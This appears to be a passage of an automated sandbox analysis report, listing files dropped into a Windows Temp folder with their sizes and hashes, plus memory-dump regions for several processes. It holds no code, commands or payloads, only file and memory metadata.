                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\p2juz33y\CSC17736DD4F6A1450A986486293441EC77.TMP
                                                                        Filesize

                                                                        652B

                                                                        MD5

                                                                        04bc25214bb19e150d86881e44465bb1

                                                                        SHA1

                                                                        6934f681f08bf6b937af34c79540cc5749e93a34

                                                                        SHA256

                                                                        70a9292d2dfed9890cb0bd93cec6f228ec8946c62e45e8613899dde2d90e4c49

                                                                        SHA512

                                                                        baacf5b5461ec770c9b78dbf0d2d9f8e84dc535dcc3a37d503800902df0a9a1e41ba0137e87fee593b8d5e626ae098887314146aee66d5c7fe77b6a4b2e77113

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\p2juz33y\p2juz33y.0.cs
                                                                        Filesize

                                                                        1004B

                                                                        MD5

                                                                        c76055a0388b713a1eabe16130684dc3

                                                                        SHA1

                                                                        ee11e84cf41d8a43340f7102e17660072906c402

                                                                        SHA256

                                                                        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                        SHA512

                                                                        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\p2juz33y\p2juz33y.cmdline
                                                                        Filesize

                                                                        607B

                                                                        MD5

                                                                        e0234467a46387fe054e1ec5765b7ae5

                                                                        SHA1

                                                                        164698c9a6f87ebcbe543543604ab4d22aff62f6

                                                                        SHA256

                                                                        c7d56db943ca07ef07cd02026cfd88db25f76b9aaa9ea23c0aee6f4897947f4d

                                                                        SHA512

                                                                        c3718125caf6aeb74aacf67665933a5693f306f5c0c65f94462b48e9bfd3d6c7d4a1a9d1e3cfc9261df7940a57523b3a0403a6aef5b1398b9fa8939916ca44bf

                                                                      • memory/1280-227-0x000001AB7F550000-0x000001AB7F572000-memory.dmp
                                                                        Filesize

                                                                        136KB

                                                                      • memory/1280-214-0x000001AB19B50000-0x000001AB19B60000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/1280-213-0x00007FFD54C10000-0x00007FFD556D1000-memory.dmp
                                                                        Filesize

                                                                        10.8MB

                                                                      • memory/1280-215-0x000001AB19B50000-0x000001AB19B60000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/2544-218-0x00007FFD54C10000-0x00007FFD556D1000-memory.dmp
                                                                        Filesize

                                                                        10.8MB

                                                                      • memory/2544-219-0x0000023C8B9D0000-0x0000023C8B9E0000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/2544-228-0x0000023C8B9D0000-0x0000023C8B9E0000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/3220-131-0x0000000006160000-0x00000000061C6000-memory.dmp
                                                                        Filesize

                                                                        408KB

                                                                      • memory/3220-198-0x000000006F760000-0x000000006F7AC000-memory.dmp
                                                                        Filesize

                                                                        304KB

                                                                      • memory/3220-16-0x0000000003180000-0x00000000031B6000-memory.dmp
                                                                        Filesize

                                                                        216KB

                                                                      • memory/3220-166-0x00000000732D0000-0x0000000073A80000-memory.dmp
                                                                        Filesize

                                                                        7.7MB

                                                                      • memory/3220-27-0x00000000732D0000-0x0000000073A80000-memory.dmp
                                                                        Filesize

                                                                        7.7MB

                                                                      • memory/3220-46-0x00000000054F0000-0x0000000005500000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/3220-31-0x00000000054F0000-0x0000000005500000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/3220-169-0x00000000054F0000-0x0000000005500000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/3220-28-0x0000000005B30000-0x0000000006158000-memory.dmp
                                                                        Filesize

                                                                        6.2MB

                                                                      • memory/3220-129-0x0000000005A80000-0x0000000005AE6000-memory.dmp
                                                                        Filesize

                                                                        408KB

                                                                      • memory/3220-141-0x00000000061D0000-0x0000000006524000-memory.dmp
                                                                        Filesize

                                                                        3.3MB

                                                                      • memory/3220-175-0x00000000054F0000-0x0000000005500000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/3220-229-0x0000000007D20000-0x0000000007DB6000-memory.dmp
                                                                        Filesize

                                                                        600KB

                                                                      • memory/3220-122-0x00000000059E0000-0x0000000005A02000-memory.dmp
                                                                        Filesize

                                                                        136KB

                                                                      • memory/3220-142-0x0000000006780000-0x000000000679E000-memory.dmp
                                                                        Filesize

                                                                        120KB

                                                                      • memory/3220-196-0x000000007FBD0000-0x000000007FBE0000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/3220-208-0x0000000006D30000-0x0000000006D4E000-memory.dmp
                                                                        Filesize

                                                                        120KB

                                                                      • memory/3220-210-0x00000000080D0000-0x000000000874A000-memory.dmp
                                                                        Filesize

                                                                        6.5MB

                                                                      • memory/3220-211-0x0000000007A90000-0x0000000007AAA000-memory.dmp
                                                                        Filesize

                                                                        104KB

                                                                      • memory/3220-209-0x0000000007950000-0x00000000079F3000-memory.dmp
                                                                        Filesize

                                                                        652KB

                                                                      • memory/3220-217-0x0000000007B00000-0x0000000007B0A000-memory.dmp
                                                                        Filesize

                                                                        40KB

                                                                      • memory/3220-197-0x0000000006D50000-0x0000000006D82000-memory.dmp
                                                                        Filesize

                                                                        200KB

                                                                      • memory/3220-144-0x0000000006850000-0x000000000689C000-memory.dmp
                                                                        Filesize

                                                                        304KB

                                                                      • memory/3228-221-0x00007FFD54C10000-0x00007FFD556D1000-memory.dmp
                                                                        Filesize

                                                                        10.8MB

                                                                      • memory/3228-216-0x000001EE595F0000-0x000001EE59600000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/4252-279-0x00007FFD51920000-0x00007FFD51F09000-memory.dmp
                                                                        Filesize

                                                                        5.9MB

                                                                      • memory/4252-182-0x00007FFD56220000-0x00007FFD562D8000-memory.dmp
                                                                        Filesize

                                                                        736KB

                                                                      • memory/4252-212-0x00007FFD66210000-0x00007FFD66233000-memory.dmp
                                                                        Filesize

                                                                        140KB

                                                                      • memory/4252-280-0x00007FFD66210000-0x00007FFD66233000-memory.dmp
                                                                        Filesize

                                                                        140KB

                                                                      • memory/4252-195-0x00007FFD51920000-0x00007FFD51F09000-memory.dmp
                                                                        Filesize

                                                                        5.9MB

                                                                      • memory/4252-288-0x00007FFD65400000-0x00007FFD6542E000-memory.dmp
                                                                        Filesize

                                                                        184KB

                                                                      • memory/4252-192-0x00007FFD65230000-0x00007FFD6523D000-memory.dmp
                                                                        Filesize

                                                                        52KB

                                                                      • memory/4252-289-0x00007FFD56220000-0x00007FFD562D8000-memory.dmp
                                                                        Filesize

                                                                        736KB

                                                                      • memory/4252-193-0x00007FFD51190000-0x00007FFD512AC000-memory.dmp
                                                                        Filesize

                                                                        1.1MB

                                                                      • memory/4252-130-0x00007FFD66710000-0x00007FFD6671F000-memory.dmp
                                                                        Filesize

                                                                        60KB

                                                                      • memory/4252-178-0x00000242C3C20000-0x00000242C3F98000-memory.dmp
                                                                        Filesize

                                                                        3.5MB

                                                                      • memory/4252-191-0x00007FFD65900000-0x00007FFD65914000-memory.dmp
                                                                        Filesize

                                                                        80KB

                                                                      • memory/4252-173-0x00007FFD65920000-0x00007FFD65939000-memory.dmp
                                                                        Filesize

                                                                        100KB

                                                                      • memory/4252-128-0x00007FFD66210000-0x00007FFD66233000-memory.dmp
                                                                        Filesize

                                                                        140KB

                                                                      • memory/4252-516-0x00007FFD51920000-0x00007FFD51F09000-memory.dmp
                                                                        Filesize

                                                                        5.9MB

                                                                      • memory/4252-159-0x00007FFD65940000-0x00007FFD65963000-memory.dmp
                                                                        Filesize

                                                                        140KB

                                                                      • memory/4252-507-0x00007FFD517A0000-0x00007FFD51917000-memory.dmp
                                                                        Filesize

                                                                        1.5MB

                                                                      • memory/4252-502-0x00007FFD66210000-0x00007FFD66233000-memory.dmp
                                                                        Filesize

                                                                        140KB

                                                                      • memory/4252-152-0x00007FFD65FE0000-0x00007FFD6600D000-memory.dmp
                                                                        Filesize

                                                                        180KB

                                                                      • memory/4252-501-0x00007FFD51920000-0x00007FFD51F09000-memory.dmp
                                                                        Filesize

                                                                        5.9MB

                                                                      • memory/4252-168-0x00007FFD66340000-0x00007FFD6634D000-memory.dmp
                                                                        Filesize

                                                                        52KB

                                                                      • memory/4252-179-0x00007FFD65400000-0x00007FFD6542E000-memory.dmp
                                                                        Filesize

                                                                        184KB

                                                                      • memory/4252-189-0x00007FFD512B0000-0x00007FFD51628000-memory.dmp
                                                                        Filesize

                                                                        3.5MB

                                                                      • memory/4252-290-0x00007FFD512B0000-0x00007FFD51628000-memory.dmp
                                                                        Filesize

                                                                        3.5MB

                                                                      • memory/4252-165-0x00007FFD517A0000-0x00007FFD51917000-memory.dmp
                                                                        Filesize

                                                                        1.5MB

                                                                      • memory/4252-120-0x00007FFD51920000-0x00007FFD51F09000-memory.dmp
                                                                        Filesize

                                                                        5.9MB

                                                                      • memory/4252-157-0x00007FFD661F0000-0x00007FFD66209000-memory.dmp
                                                                        Filesize

                                                                        100KB

                                                                      • memory/4596-15-0x00000000002F0000-0x0000000000300000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/4596-220-0x0000000004E80000-0x0000000004E90000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/4596-108-0x0000000004BB0000-0x0000000004BBA000-memory.dmp
                                                                        Filesize

                                                                        40KB

                                                                      • memory/4596-30-0x0000000004BF0000-0x0000000004C82000-memory.dmp
                                                                        Filesize

                                                                        584KB

                                                                      • memory/4596-112-0x0000000004D00000-0x0000000004D58000-memory.dmp
                                                                        Filesize

                                                                        352KB

                                                                      • memory/4596-116-0x0000000004E80000-0x0000000004E90000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/4596-163-0x00000000732D0000-0x0000000073A80000-memory.dmp
                                                                        Filesize

                                                                        7.7MB

                                                                      • memory/4596-194-0x0000000004E80000-0x0000000004E90000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/4596-143-0x0000000004E80000-0x0000000004E90000-memory.dmp
                                                                        Filesize

                                                                        64KB

                                                                      • memory/4596-25-0x00000000052B0000-0x0000000005854000-memory.dmp
                                                                        Filesize

                                                                        5.6MB

                                                                      • memory/4596-17-0x00000000732D0000-0x0000000073A80000-memory.dmp
                                                                        Filesize

                                                                        7.7MB

                                                                      • memory/5036-115-0x00007FFD54C10000-0x00007FFD556D1000-memory.dmp
                                                                        Filesize

                                                                        10.8MB

                                                                      • memory/5036-92-0x0000000000B70000-0x0000000000B8A000-memory.dmp
                                                                        Filesize

                                                                        104KB

                                                                      • memory/5036-190-0x00007FFD54C10000-0x00007FFD556D1000-memory.dmp
                                                                        Filesize

                                                                        10.8MB